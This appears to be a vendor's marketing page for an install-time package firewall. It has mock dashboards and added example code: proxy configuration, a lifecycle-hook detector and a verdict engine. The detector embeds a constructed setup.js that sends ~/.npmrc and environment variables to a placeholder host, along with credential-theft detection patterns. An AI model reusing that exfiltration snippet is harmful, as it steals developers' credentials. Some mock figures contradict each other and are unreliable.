World's first · install-time firewall

Stop malicious packages
at the install, not the audit.

The CyberXYZ Platform is the world's first install-time supply-chain firewall. A registry proxy intercepts every install, a decision brain reads the code at the commit level, and one dashboard governs inventory, SBOMs and integrations, across laptops, CI/CD and Kubernetes.

ENFORCING 4/4 registries · npm ONLINE · Python ONLINE · Go ONLINE · NuGet ONLINE
xyz-npm-proxy ● live
    npm install axios@1.14.1              403 BLOCK
    pip install requests==2.32.0          200 ALLOW
    npm install left-pad@1.3.0            451 QUAR
    dotnet add package Newtonsoft.Json    200 ALLOW
tarball scan · commit-level analysis · ~80 ms median

fig. 01 · live registry proxy (the firewall)

GitHub · GitLab · Azure DevOps · JavaScript / npm · Python / PyPI · Go · .NET / NuGet · Java
The firewall

A verdict on every install,
before it touches disk.

CyberXYZ sits in front of registry.npmjs.org, pypi.org and the rest. Every request is intercepted, the tarball is buffered and scanned, and the proxy returns allow, alert, quarantine or block, in milliseconds. Cluster-wide enforcement, zero developer friction.
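For the proxy to see every install, each package manager on a laptop or CI runner has to be told to use it. The script below is an added example, not CyberXYZ's own client tooling or installer: it writes the client-side configuration for npm, pip, Go and NuGet against an assumed proxy base URL and assumed per-ecosystem paths, and checks that nothing still points at a public registry.

```shell
#!/bin/sh
# Added example; not CyberXYZ tooling. Routes the four package managers this
# page covers through one registry proxy so every install crosses the firewall.
# PROXY_BASE and the per-ecosystem paths (/npm/, /pypi/simple/, /go, /nuget/)
# are assumptions for illustration; use your deployment's real endpoints.
set -eu

PROXY_BASE="${PROXY_BASE:-https://proxy.example.internal}"

# Writes the client-side config files under $1 (default: $HOME) without calling
# npm, pip, go or dotnet, so the output can be reviewed and diffed first.
write_proxy_config() {
  dir="${1:-$HOME}"
  mkdir -p "$dir/.config/pip"

  # npm: a single registry line. A scoped override (@scope:registry=...) in a
  # project .npmrc would bypass this, so also block egress to registry.npmjs.org.
  printf 'registry=%s/npm/\n' "$PROXY_BASE" > "$dir/.npmrc"

  # pip: replace, do not add to, the index. An extra-index-url anywhere is a
  # second path to pypi.org that the proxy never sees.
  printf '[global]\nindex-url = %s/pypi/simple/\n' "$PROXY_BASE" \
    > "$dir/.config/pip/pip.conf"

  # Go: no ",direct" fallback, so a module the proxy refuses cannot be fetched
  # straight from the origin. GOSUMDB stays on: checksum verification is a
  # separate control and still applies behind the proxy. (.go-proxy.env is a
  # hypothetical file to source in the shell or CI job.)
  printf 'GOPROXY=%s/go\nGOSUMDB=sum.golang.org\n' "$PROXY_BASE" \
    > "$dir/.go-proxy.env"

  # NuGet: <clear /> drops nuget.org before adding the proxy feed; without it
  # a restore keeps a direct source.
  cat > "$dir/NuGet.Config" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <packageSources>
    <clear />
    <add key="firewall" value="${PROXY_BASE}/nuget/v3/index.json" />
  </packageSources>
</configuration>
EOF
  printf '%s\n' "$dir"
}

# Pre-install check for CI: fail if any config still names a public registry.
verify_no_direct_registry() {
  dir="${1:-$HOME}"
  for f in "$dir/.npmrc" "$dir/.config/pip/pip.conf" \
           "$dir/.go-proxy.env" "$dir/NuGet.Config"; do
    [ -f "$f" ] || return 1
    if grep -qE 'registry\.npmjs\.org|pypi\.org|proxy\.golang\.org|api\.nuget\.org' "$f"; then
      return 1
    fi
  done
  return 0
}
```

Call `write_proxy_config` with a scratch directory to review the output, or with no argument to write into $HOME; run `verify_no_direct_registry` as the first step of any CI job that installs dependencies. The proxy-side paths are whatever the deployment exposes; the client-side points that decide whether enforcement holds are the ones commented inline: no Go `direct` fallback, no pip `extra-index-url`, a `<clear />` in NuGet.Config, and egress filtering so a scoped `.npmrc` cannot route around the firewall.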

app.cyberxyz.io/proxy/findings
May 28, 10:40 AM · npm · flatmap-stream@0.1.1 · BLOCKED · gha/CyberXYZ CI/CD · Linux · 172.184.213.226 · CRITICAL
    BLOCKED [known_malicious_version] Confirmed supply-chain attack: credential_stealer. Safe versions: 0.1.0 · CRITICAL
    BLOCKED [vulnerability_match] GHSA-9x64-5r7x-2q53 · ranges ['= 0.1.1'] · fixed: none · CRITICAL
    BLOCKED [vulnerability_match] GHSA-mh6f-8j2x-4483 · ranges ['>= 0'] · fixed: none · CRITICAL
May 26, 09:22 AM · npm · axios@1.14.1 · BLOCKED · Mike’s MacBook (dev) · macOS · 169.254.169.126 · CRITICAL
    BLOCKED [known_malicious_version] Confirmed supply-chain attack: RAT dropper via compromised maintainer. Safe versions: 1.7.7, 1.7.6, 1.7.5 · CRITICAL
    ALERT [vulnerability_match] GHSA-q8qp-cvcw-x6jj · ranges ['>=1.0.0', '<1.15.2'] · fixed: none · HIGH
    QUARANTINE [version_jump_anomaly] axios jumped from 1.10.0 to 1.14.1 (4 minor versions in one night) · MEDIUM
May 22, 12:15 PM · npm · left-pad@1.3.1 · BLOCKED · gitlab/cyber CI/CD · Linux · 34.139.136.251 · CRITICAL
May 22, 12:15 PM · Go · go-weather-sdk@v0.4.0 · BLOCKED · gitlab/cyber CI/CD · Linux · 34.139.136.251 · CRITICAL
May 22, 12:15 PM · NuGet · AeroWizard.Net@2.3.1 · BLOCKED · gitlab/cyber CI/CD · Linux · 34.139.136.251 · CRITICAL
May 22, 12:15 PM · PyPI · durabletask@1.4.1 · QUARANTINE · gitlab/cyber CI/CD · Linux · 34.139.136.251 · MEDIUM

fig. 02 · proxy findings (live capture from app.cyberxyz.io)

Commit-level detection

We read the code,
not just the scorecard.

Most "supply-chain" tools rate a package on project-health signals (OSSF scorecards). CyberXYZ does that and reads the actual change, line by line, commit by commit, so a malicious postinstall hook is caught the moment it lands, with no CVE required.

// across your repos · GitHub · GitLab
a3f9c2e chore: tidy build scripts 2 days ago
package.json
31 "scripts": {
32- "build": "tsc"
32+ "build": "tsc",
33+ "postinstall": "node ./.cache/setup.js"
XYZ · Lifecycle hook added in a "tidy" commit. setup.js base64-decodes a payload and POSTs ~/.npmrc + env to 45.32.0.0/16. Verdict: BLOCK, no CVE required.
34 }
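Review bot: the added `"postinstall": "node ./.cache/setup.js"` line runs a script that this hunk neither adds nor shows, so nothing in the change lets a reviewer see what executes on every `npm install`; a file under a dot-directory is also easy to overlook in review. A lifecycle hook has no place in a commit titled "chore: tidy build scripts": either commit `setup.js` outside `.cache/` and review it alongside the manifest, or drop the hook.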

fig. 03 · commit-level verdict (built mock)
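The diff-aware part of the detection described above, as an added example that is not part of the page or the CyberXYZ engine: it takes the manifest before and after a commit, reports lifecycle hooks the commit introduced, and scores the script a new hook runs on its behaviour, so a verdict needs no advisory. The manifests, thresholds and the stand-in setup.js body are constructed; the host in it is a documentation address, not an indicator.

```python
"""Added example, not CyberXYZ code: a diff-aware check for the pattern in
fig. 03. It compares a package manifest before and after a commit, reports
lifecycle hooks that the commit introduced, and scores the script a new hook
runs on what it does (decode, connect, read credentials), so a verdict needs
no advisory. The manifests and the setup.js body below are constructed
stand-ins; the exfil host and payload are placeholders, not real IOCs."""
import json
import re

# npm runs these during install without the user asking; a new one is the signal.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Behavioural indicators looked for in a referenced script: (regex, weight, label).
INDICATORS = [
    (r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\(", 2, "base64-decodes a payload"),
    (r"\b(https?\.request|fetch|net\.connect|XMLHttpRequest)\b", 2, "opens a network connection"),
    (r"\.npmrc\b|NPM_TOKEN|process\.env\b", 3, "reads credentials or environment"),
    (r"\b(child_process|exec(Sync)?|spawn(Sync)?)\b", 2, "spawns a process"),
    (r"\b(eval|new Function)\s*\(", 2, "evaluates dynamic code"),
]

# Thresholds are illustrative policy, not the product's scoring.
BLOCK_AT, QUARANTINE_AT = 8, 3


def added_hooks(old_manifest: str, new_manifest: str) -> dict:
    """Lifecycle scripts present after the commit that were absent or different before."""
    old = json.loads(old_manifest).get("scripts", {})
    new = json.loads(new_manifest).get("scripts", {})
    return {k: v for k, v in new.items() if k in LIFECYCLE_HOOKS and old.get(k) != v}


def referenced_files(command: str) -> list:
    """Local script paths named in a hook command, e.g. 'node ./.cache/setup.js'."""
    return re.findall(r"(?:\./)?[\w./-]+\.(?:js|cjs|mjs|sh)\b", command)


def in_dot_directory(path: str) -> bool:
    """True for paths like ./.cache/setup.js, which code review tends to skip."""
    return re.search(r"(^|/)\.[^/]+/", path) is not None


def score_script(source: str) -> list:
    """(weight, label) for every behavioural indicator found in the script."""
    return [(w, label) for pat, w, label in INDICATORS if re.search(pat, source)]


def analyze_commit(old_manifest: str, new_manifest: str, files: dict) -> dict:
    """Combine hook additions and referenced-script behaviour into one verdict.

    files maps the path used in the hook command to that file's contents at the
    new commit; a path missing from it means the script is not in the repo."""
    findings, score = [], 0
    for hook, command in added_hooks(old_manifest, new_manifest).items():
        findings.append(f"lifecycle hook '{hook}' added: {command}")
        score += 3
        for path in referenced_files(command):
            if in_dot_directory(path):
                findings.append(f"{path}: hook runs a script from a dot-directory")
                score += 2
            if path not in files:
                findings.append(f"{path}: referenced script is not in the commit")
                score += 2
            for weight, label in score_script(files.get(path, "")):
                findings.append(f"{path}: {label}")
                score += weight
    verdict = ("block" if score >= BLOCK_AT
               else "quarantine" if score >= QUARANTINE_AT else "allow")
    return {"score": score, "verdict": verdict, "findings": findings}


# Constructed sample: the "chore: tidy build scripts" commit from fig. 03.
OLD_PACKAGE_JSON = '{"name": "example-lib", "scripts": {"build": "tsc"}}'
NEW_PACKAGE_JSON = ('{"name": "example-lib", "scripts": {"build": "tsc", '
                    '"postinstall": "node ./.cache/setup.js"}}')
# Constructed stand-in for the dropped setup.js (documentation host, no real payload).
SETUP_JS = """
const https = require('https'), fs = require('fs'), os = require('os');
const stage2 = Buffer.from(process.env.STAGE2 || '', 'base64').toString();
const creds = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');
https.request({host: '203.0.113.10', method: 'POST'})
     .end(creds + JSON.stringify(process.env) + stage2);
"""

if __name__ == "__main__":
    result = analyze_commit(OLD_PACKAGE_JSON, NEW_PACKAGE_JSON,
                            {"./.cache/setup.js": SETUP_JS})
    print(result["verdict"].upper(), result["score"])
    for line in result["findings"]:
        print(" -", line)
```

The point of scoring the added hook on its own, before the script is even read, is that a hook whose script is missing from the commit cannot be cleared by review; the example quarantines that case rather than allowing it, and blocks only when the script's behaviour confirms the intent.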

Diff-aware

Every commit is parsed: added lifecycle hooks, network calls, obfuscation and file writes are scored, not just the manifest.

No CVE required

Day-zero malware is caught on behavior and intent, before any advisory exists.

Beyond OSSF scorecards

Other proxies and repository managers stop at project-health signals. We add the actual code change on top.

MITRE ATT&CK tagged

Findings map to techniques, so your SOC sees them in language it already speaks.

The decision brain

Every surface asks
the same brain.

Editor, CLI, CI/CD and the runtime proxy all route to one decision engine: four signals, one verdict, in ~80 ms. See the full methodology →
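What "one brain, four signals, one verdict" looks like as code, as an added example that is not the CyberXYZ decision engine: a single function that fuses the four signals with advisory range matching and the version-jump anomaly from fig. 02, and returns both the verdict and the HTTP status the proxy would answer with. The severity policy, thresholds, advisory ID and intel entries are constructed for illustration; answering 200 for an alert is an assumption, since the page shows only 200, 451 and 403.

```python
"""Added example, not the CyberXYZ engine: one decision function that the
editor, CLI, CI job and proxy can all call. It fuses the four signals named
on this page (tarball scan, commit analysis, blast radius, threat intel) with
advisory range matching and the version-jump anomaly from fig. 02, and maps
the verdict to the HTTP status the proxy answers with (200 / 451 / 403 as in
fig. 01; 200 for an alert is an assumption). Severity policy, thresholds,
advisory IDs and intel entries are constructed for illustration."""
import re
from typing import Optional

SEVERITY = {"none": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
HTTP_STATUS = {"allow": 200, "alert": 200, "quarantine": 451, "block": 403}


def parse_semver(v: str) -> tuple:
    """'v1.2.3-rc1' -> (1, 2, 3); raises on anything that is not semver."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", v)
    if not m:
        raise ValueError(f"not a semver version: {v}")
    return tuple(int(x) for x in m.groups())


def in_range(version: str, spec: str) -> bool:
    """True when version satisfies every comparator, e.g. '>=1.0.0, <1.15.2'."""
    v = parse_semver(version)
    for comp in spec.split(","):
        m = re.fullmatch(r"\s*(>=|<=|>|<|=)\s*(\S+)\s*", comp)
        if not m:
            raise ValueError(f"bad comparator: {comp!r}")
        op, bound = m.group(1), parse_semver(m.group(2))
        if not {">=": v >= bound, "<=": v <= bound, ">": v > bound,
                "<": v < bound, "=": v == bound}[op]:
            return False
    return True


def version_jump(last_seen: Optional[str], requested: str,
                 max_minor_step: int = 1) -> Optional[str]:
    """Flag a release that leaps past what the fleet last installed.

    A normal upgrade moves one minor at a time; a tag that appears several
    minors ahead overnight is how a hijacked publish often looks."""
    if last_seen is None:
        return None
    old, new = parse_semver(last_seen), parse_semver(requested)
    if new[0] == old[0] and new[1] - old[1] > max_minor_step:
        return f"jumped from {last_seen} to {requested} ({new[1] - old[1]} minor versions)"
    return None


def decide(package: str, version: str, *, last_seen: Optional[str] = None,
           known_malicious: frozenset = frozenset(), advisories: tuple = (),
           tarball: str = "none", commit: str = "none",
           blast_radius: str = "none") -> dict:
    """Fuse the signals into one verdict plus the proxy's HTTP status."""
    reasons, worst = [], 0

    def hit(sev: str, why: str) -> None:
        nonlocal worst
        worst = max(worst, SEVERITY[sev])
        reasons.append(f"{sev.upper()} {why}")

    if (package, version) in known_malicious:            # live threat intel
        hit("critical", "known_malicious_version")
    for adv_id, spec, sev in advisories:                  # published advisories
        if in_range(version, spec):
            hit(sev, f"vulnerability_match {adv_id} ({spec})")
    if tarball != "none":                                 # script & tarball scan
        hit(tarball, "script_tarball_scan")
    if commit != "none":                                  # commit-level analysis
        hit(commit, "commit_level_analysis")
    jump = version_jump(last_seen, version)
    if jump:
        reasons.append(f"MEDIUM version_jump_anomaly: {jump}")

    # Illustrative policy: critical blocks; high alerts, except that a high
    # match on a package with a large blast radius is quarantined; medium or
    # an anomaly quarantines; otherwise allow.
    if worst >= SEVERITY["critical"]:
        verdict = "block"
    elif worst == SEVERITY["high"]:
        verdict = "quarantine" if SEVERITY[blast_radius] >= SEVERITY["high"] else "alert"
    elif worst == SEVERITY["medium"] or jump:
        verdict = "quarantine"
    else:
        verdict = "allow"
    return {"package": package, "version": version, "verdict": verdict,
            "status": HTTP_STATUS[verdict], "reasons": reasons}


# Constructed sample data mirroring figs. 01 and 02 (the advisory ID is a placeholder).
KNOWN_MALICIOUS = frozenset({("axios", "1.14.1"), ("flatmap-stream", "0.1.1")})
ADVISORIES = (("GHSA-EXAMPLE-0001", ">=1.0.0, <1.15.2", "high"),)

if __name__ == "__main__":
    for pkg, ver, seen in (("axios", "1.14.1", "1.10.0"),
                           ("requests", "2.32.0", "2.31.0"),
                           ("left-pad", "1.3.0", "1.1.0")):
        r = decide(pkg, ver, last_seen=seen, known_malicious=KNOWN_MALICIOUS,
                   advisories=ADVISORIES if pkg == "axios" else (),
                   blast_radius="high" if pkg == "axios" else "none")
        print(f"{pkg}@{ver}: {r['status']} {r['verdict'].upper()}", *r["reasons"], sep="\n  ")
```

Two design points carry over to any real engine: the anomaly signal is computed against what this fleet last installed, not against the registry's own history, so it fires for a tenant even when the bad tag has been live for days elsewhere; and the verdict is a function of the worst signal plus context (blast radius), never a sum of scores, so one critical hit cannot be diluted by several clean ones.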

One dashboard

Machines, installs and verdicts,
in one place.

app.cyberxyz.io/fleet
Dev machines · 1 at risk
    Mike’s MacBook Air · dev machine · Darwin · 169.254.169.126 · 0 installs · 34 scans · 0 blocked · SSL proxy
CI / CD · 9 at risk
    gha/CyberXYZSecurity/cyb… · Linux · 31.146.211.20 · 32 installs · clean · proxy
    gha/CyberXYZSecurity/cyb… · Linux · 128.66.193.5 · 32 installs · clean · proxy
    gha/CyberXYZSecurity/cyb… · Linux · 171.194.112.9 · 34 installs · 0 blocked · proxy
    gha/CyberXYZSecurity/cyb… · Linux · 97.104.221.7 · 32 installs · clean · proxy
    gha/CyberXYZSecurity/cyb… · Linux · 38.61.175.230 · 32 installs · clean · proxy
    gha/CyberXYZSecurity/cyb… · Linux · 115.211.133.20 · 32 installs · clean · proxy
    cyberxyz-security/jdi… · Linux · 203.168.198.6 · 78 installs · 0 blocked · proxy
    ado/cyberxyz-test/age… · Linux · 38.226.207.101 · 3 installs · 0 blocked · proxy

fig. 04 · fleet overview (every machine, one place)

app.cyberxyz.io/notifications/15835
notification #15835 · May 28 · 11d ago

Blocked install: axios@1.14.1 on gha/CyberXYZSecurity/cyberxyz-platform · GitHub Actions 1000000333

RISK SCORE 0/10 · critical · verdict block
FLEET IMPACT 0 of 3 machines · 0% (gha/CyberXYZSecurity/cyberxyz-platform · GHA 1000000333 · Mike’s MacBook Air · docker-container)
STATEMENT Ecosystem npm · decision block (confidence 1.0) · machine gha/CyberXYZSecurity/cyberxyz-platform · suggested safe version 1.7.7
SIGNALS · 4 of 4 fired
    01 Script & Tarball Scan · triggered · CRITICAL: Obfuscated postinstall hook base64-decodes a payload and POSTs ~/.npmrc + env to 45.32.0.0/16.
    02 Commit-Level Analysis · triggered · CRITICAL: Maintainer commit a3f9c2e injected a credential-exfil routine in a “tidy build” change. No CVE filed.
    03 Centrality & Blast Radius · elevated · HIGH: 113.2M weekly installs, present on 3 of 3 machines. Top 0.1% blast radius across the dependency graph.
    04 Live Threat Intel · matched · CRITICAL: Matches active campaign: RAT dropper via compromised maintainer. First seen 2026-05-26, 11 orgs hit.
PACKAGE CONTEXT version 1.14.1 · published Mar 30 · 0 weekly downloads · 1 maintainer · github.com/axios/axios · MIT
PACKAGE axios · VERSION 1.14.1 · ECOSYSTEM npm · DECISION BLOCK

fig. 05 · install verdict (XYZ score, live capture)

Integrations

Plugs into the tools
your SOC already runs.

Native connectors for SIEMs, CI/CD, IDEs and orchestration. Every verdict and IOC, delivered where your team already works.

GitHub · GitHub Actions · GitLab CI · Azure DevOps · Microsoft · Jenkins · IBM QRadar · Splunk · SentinelOne · CrowdStrike · Elastic SIEM · Kubernetes · Docker · Webhooks
// the ask

See the firewall
block a live attack.

Get a 15-minute walkthrough of the proxy, the commit-level brain and the dashboard. We'll plug it into your CI in under an hour.

  • Live proxy demo
  • Free proof-of-concept
  • CI integration in < 1 hour


Get a demo

We'll respond within 24 hours. No spam, ever.